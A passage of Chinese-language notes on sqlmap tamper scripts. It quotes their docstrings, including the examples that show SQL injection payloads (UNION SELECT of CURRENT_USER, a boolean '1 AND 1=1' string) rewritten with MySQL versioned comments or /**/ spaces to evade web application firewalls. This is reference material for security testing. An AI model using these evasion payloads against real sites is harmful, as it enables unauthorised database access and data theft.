"1 AND 1=1 and '0having'='0having'"
"""

versionedmorekeywords.py

作用：mysql注釋繞過 如/!UNION/
僅針對于[mysql]

原文件內(nèi)的說明：
"""
Encloses each keyword with versioned MySQL comment

Requirement:
    * MySQL >= 5.1.13

Tested against:
    * MySQL 5.1.56, 5.5.11

Notes:
    * Useful to bypass several web application firewalls when the
      back-end database management system is MySQL

>>> tamper('1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,122,114,115,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,115,114,121,58))#')
'1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL*/,/*!CONCAT*/(/*!CHAR*/(58,122,114,115,58),/*!IFNULL*/(CAST(/*!CURRENT_USER*/()/*!AS*//*!CHAR*/),/*!CHAR*/(32)),/*!CHAR*/(58,115,114,121,58))#'
"""

space2comment.py

作用：替換空格為/**/

原文件內(nèi)的說明：
"""
Replaces space character (' ') with comments '/**/'

Tested against:
    * Microsoft SQL Server 2005
    * MySQL 4, 5.0 and 5.5
    * Oracle 10g
    * PostgreSQL 8.3, 8.4, 9.0

Notes:
    * Useful to bypass weak and bespoke web application firewalls

>>> tamper('SELECT id FROM users')
'SELECT/**/id/**/FROM/**/users'
"""

案例一:http://www.wooyun.org/bugs/wooyun-2010-046496

halfversionedmorekeywords.py

作用：關(guān)鍵字前加 mysql版本注釋的前一半 /*!
僅針對于[mysql]

"value' UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND 'QDWa'='QDWa"

"value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)),/*!0NULL,/*!0NULL#/*!0AND 'QDWa'='QDWa"

原文件內(nèi)的說明：
    """
    Adds versioned MySQL comment before each keyword

    Requirement:
        * MySQL < 5.1

    Tested against:
        * MySQL 4.0.18, 5.0.22

    Notes:
        * Useful to bypass several web application firewalls when the
          back-end database management system is MySQL
        * Used during the ModSecurity SQL injection challenge,
          http://modsecurity.org/demo/challenge.html

    >>> tamper("value' UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND 'QDWa'='QDWa")
    "value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)),/*!0NULL,/*!0NULL#/*!0AND 'QDWa'='QDWa"
    """